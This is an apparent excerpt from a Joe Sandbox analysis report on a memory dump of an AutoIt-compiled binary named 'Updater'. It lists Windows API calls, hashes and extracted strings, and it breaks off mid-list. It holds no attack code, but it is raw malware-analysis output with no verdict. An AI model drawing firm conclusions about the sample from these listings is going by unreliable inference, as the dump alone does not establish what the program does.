                                                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                    • API String ID: 37000740-45149045
                                                                                                                                                    • Opcode ID: 47e94a4dddbdfcac80b4fde9d63621a027c565d50ce1007806b5ec9e635c78b8
                                                                                                                                                    • Instruction ID: 7af57e34e1833cf9a26a655324d222f111fadc008fb61ddd98d806e77407a28e
                                                                                                                                                    • Opcode Fuzzy Hash: 47e94a4dddbdfcac80b4fde9d63621a027c565d50ce1007806b5ec9e635c78b8
                                                                                                                                                    • Instruction Fuzzy Hash: BB0269342142118FCB14FF14C495ABABBE1EF94344F1444E8F94A5B3A2DBB1ED4ACB96
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00B35689
                                                                                                                                                    • SendMessageW.USER32(00450075,00001308,?,00000000), ref: 00B79128
                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B79161
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B7958E
                                                                                                                                                      • Part of subcall function 00B3438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B35687,01472BD8,?,?,?), ref: 00B343EF
                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00B795CA
                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B795E1
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B795F7
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B79602
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                                    • Opcode ID: f394f693797d8c0610ad39ea233b809a4f77dd9783eb88c6f413ecd52b327abc
                                                                                                                                                    • Instruction ID: 2dc82be244982fe2dd6578e773bd38715a92436c0af5de81e9edd914ca3659d3
                                                                                                                                                    • Opcode Fuzzy Hash: f394f693797d8c0610ad39ea233b809a4f77dd9783eb88c6f413ecd52b327abc
                                                                                                                                                    • Instruction Fuzzy Hash: F4128E30604611EFDB25DF24C885BA9BBE5FF44310F6485A9F4AA8B662CB71EC42CF51
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00BA32EF
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BA33BA
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BA33F8
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BA3408
                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BA344E
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BA345A
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BA34A1
                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA34B0
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00BA34C0
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BA34C4
                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BA34D4
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA34DD
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00BA34E6
                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BA3512
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BA3529
                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BA3564
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BA3578
                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BA3589
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BA35B9
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00BA35C4
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BA35CF
                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BA35D9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                    • Opcode ID: 41e9195e671bc35f21c5f7f5735204613d0bbd32854700eacc4a8960f8bfeeaf
                                                                                                                                                    • Instruction ID: 37de9f3a0fcd5f10152893806b95cac1706713b56174d5afed6282720f040be7
                                                                                                                                                    • Opcode Fuzzy Hash: 41e9195e671bc35f21c5f7f5735204613d0bbd32854700eacc4a8960f8bfeeaf
                                                                                                                                                    • Instruction Fuzzy Hash: 11A14171A40215BFEB14DF65DC49FAE7BF9EB45710F008154FA15AB2E0DAB8AE00CB64
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B9568F
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,PhysicalDrive,\\.\), ref: 00B9576F
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,PhysicalDrive,\\.\), ref: 00B958DB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                    • Opcode ID: 29754284a15d0ffe8af17106a20f20dd1885af94424e8fd963bb5f0845a38580
                                                                                                                                                    • Instruction ID: f50b1181f214a4827c8d0f949f1250ba32a3257644c954163abc43652377d4db
                                                                                                                                                    • Opcode Fuzzy Hash: 29754284a15d0ffe8af17106a20f20dd1885af94424e8fd963bb5f0845a38580
                                                                                                                                                    • Instruction Fuzzy Hash: 1861B470AC8A45EBCB22DF65D9E187C77E1EB04340B2480F5E40AAB2A2DB75DE41DB51
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BB0CF0
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0D27
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB0D68
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0D78
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0DBF
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0E31
                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BB0E72
                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB0EA4
                                                                                                                                                      • Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A
                                                                                                                                                      • Part of subcall function 00B83498: SendMessageW.USER32(?,0000102B,?,00000000), ref: 00B834F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                    • Opcode ID: 594189b5d31757631548895a80da16c692089d664e39d3cc521541a87b8992ff
                                                                                                                                                    • Instruction ID: cd14ceddd73ceb9e5dc82b76689daf668ccf2936cc725b836c84444019534999
                                                                                                                                                    • Opcode Fuzzy Hash: 594189b5d31757631548895a80da16c692089d664e39d3cc521541a87b8992ff
                                                                                                                                                    • Instruction Fuzzy Hash: 62D1C0302042119BCB14FF28C891ABAB7E5EF84754F1449ECF85A9B3A2DBB1ED45CB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00BB1A60
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00BB1A75
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00BB1A7C
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BB1AD5
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BB1B0E
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB1B2C
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00BB1B4A
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BB1B6C
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00BB1B81
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BB1B94
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00BB1BB4
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BB1BCF
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BB1BE3
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00BB1BFB
                                                                                                                                                    • MonitorFromPoint.USER32(00000000,00000000,00000002), ref: 00BB1C21
                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00BB1C3B
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00BB1C52
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00BB1CBD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                    • Opcode ID: c626a2ca114702bf329809a0a41263844705dcd378e9018ab8baef1dea5c792b
                                                                                                                                                    • Instruction ID: 34c728d2cffe1e80e1b0cfba7b4337ba4d3f6ed67a048d5a321bd0f57af448af
                                                                                                                                                    • Opcode Fuzzy Hash: c626a2ca114702bf329809a0a41263844705dcd378e9018ab8baef1dea5c792b
                                                                                                                                                    • Instruction Fuzzy Hash: A0B19D70604341AFC714CF28C894AABBBE5FF89310F408A5CF59A9B261DBB4ED45CB65
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B852BE
                                                                                                                                                      • Part of subcall function 00B85096: CharUpperBuffW.USER32(?,?,00000000,00BBD938,?,00000000,?,?,?,00B85334,-00000001,-00000001,-00000002,-00000001), ref: 00B85123
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B85344
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B853B0
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B853F5
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B85406
                                                                                                                                                    • IsWindow.USER32(?), ref: 00B85446
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B85483
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B854DE
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B85547
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B855AB
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8560C
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8566C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$Window$Foreground$BuffCharUpper
                                                                                                                                                    • String ID: ACTIVE$CLASS$HANDLE$LAST$REGEXPCLASS$REGEXPTITLE
                                                                                                                                                    • API String ID: 86693105-4025514379
                                                                                                                                                    • Opcode ID: 827c9420f5c28d978ad6712be42e3261b1310ea74c577349c74f3f3a3833f874
                                                                                                                                                    • Instruction ID: 9d6e3b8982cc28120592ea67ad0cb0dc5b67eeffb63523f127b37db85feb6c44
                                                                                                                                                    • Opcode Fuzzy Hash: 827c9420f5c28d978ad6712be42e3261b1310ea74c577349c74f3f3a3833f874
                                                                                                                                                    • Instruction Fuzzy Hash: 32E1F871A00B029BCB24EF68C481ABAB7E1FF60340F4445BDE45687265FB70ED59CB92
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BACEBD
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BBD938,00000000,?,00000000,?,?), ref: 00BACF44
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BACFA4
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BACFF4
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BAD06F
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BAD0B2
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BAD1C1
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BAD24D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BAD281
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BAD28E
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BAD360
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                    • Opcode ID: f8ce46f4f54e54922d76438d5aa3ef629a2d34654b6e5f6d927b068715318868
                                                                                                                                                    • Instruction ID: e7f8bfd8a1adc2ca714b41c8923b17ae7577ca70e8722bb9d4f1732b6b9dcffd
                                                                                                                                                    • Opcode Fuzzy Hash: f8ce46f4f54e54922d76438d5aa3ef629a2d34654b6e5f6d927b068715318868
                                                                                                                                                    • Instruction Fuzzy Hash: D1126A35208211AFCB14DF14C891B2ABBE5FF89714F14849CF95A9B3A2CB35EE41CB95
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BB1398
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB13CF
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB1410
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB1435
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB1488
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB14E2
                                                                                                                                                      • Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A
                                                                                                                                                      • Part of subcall function 00B83A35: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00B83A67
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                    • Opcode ID: 7ed47b6381aa9ca7713928735bedc2979d4793f487d89b37c1a4c92768ad181f
                                                                                                                                                    • Instruction ID: 4ea5b3bf1b13ca031c293effcf67db2fe744af4ec8c401504e5905247223e7b7
                                                                                                                                                    • Opcode Fuzzy Hash: 7ed47b6381aa9ca7713928735bedc2979d4793f487d89b37c1a4c92768ad181f
                                                                                                                                                    • Instruction Fuzzy Hash: BBC1C2706042119FCB14EF28C461ABAB7E1EF94704F4448ECF85A5B3A2DB75EE46CB91
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                    • API String ID: 0-1645009161
                                                                                                                                                    • Opcode ID: a1d3f4e5a85f6c6ef224c7a5970e05b63c909445ebe36ff275a7f75dbb324b3b
                                                                                                                                                    • Instruction ID: 4063a49f5cbca515e4340db3898e19ec30498cd558f6b9c8fb8bd5d6373c3c1f
                                                                                                                                                    • Opcode Fuzzy Hash: a1d3f4e5a85f6c6ef224c7a5970e05b63c909445ebe36ff275a7f75dbb324b3b
                                                                                                                                                    • Instruction Fuzzy Hash: 3691D471A40609BBDB11BF64CC53FAE37E8EF54300F1480E5F909AA196EBB0DA11D7A1
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB8D25
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB8D39
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB8D5C
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB8D7F
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BB8DC1
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00BB3FB0,?), ref: 00BB8E23
                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8E5C
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BB8E9F
                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8ED6
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00BB8EE2
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BB8EF2
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00BB8F01
                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BB8F1E
                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BB8F2A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                    • Opcode ID: d6ce6f537d63f0a2f0282ad536a41a3edb246cec839a2e9aa7f35d1c4cf9e876
                                                                                                                                                    • Instruction ID: aed67defc43901bb9d6187d7b2c290941ff242c9128fedbf2bfc2c4620cf27c8
                                                                                                                                                    • Opcode Fuzzy Hash: d6ce6f537d63f0a2f0282ad536a41a3edb246cec839a2e9aa7f35d1c4cf9e876
                                                                                                                                                    • Instruction Fuzzy Hash: 85619D71500215FBEB289F64CC45BFA77ECEB08711F10429AF919D61D0DFB99A90DBA0
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00B94B0A
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B94B15
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B94B5C
